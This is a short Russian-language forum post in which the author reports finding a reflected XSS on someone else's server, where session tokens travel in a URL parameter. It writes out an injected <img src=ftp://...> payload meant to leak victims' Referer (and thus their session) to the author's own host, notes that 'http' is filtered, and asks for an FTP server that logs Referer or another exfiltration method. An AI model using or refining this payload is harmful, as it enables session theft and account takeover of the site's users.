Извиняюсь за возможно лёгкий вопрос заранее.
Нашёл в одном из интересующих менЯ серверов пассивную XSS, coockie сервер не использует , да они мне и ненужны , тк данные сесии идут через адресную строку get запросом в переменной $a. ХSS не имеет ограничений по количеству символов . Я решил , что если сделать в XSS так <img src=http://******> то браузер обратится к моему серверу и я получу значение refer . Но скрипт каким-то образом фильтрует слово http((( однако на ftp спокойно пустил(<img src=ftp://*****>).Я пробовал смотреть логи Golden Ftp Server , но там нет , использовал FTP сервер встроеный в Small http Server . Но там тоже этого не нашёл . Пожалуйста подскажите или какой-нибудь другой способ или ftp сервер пишущий в лог поле рефер .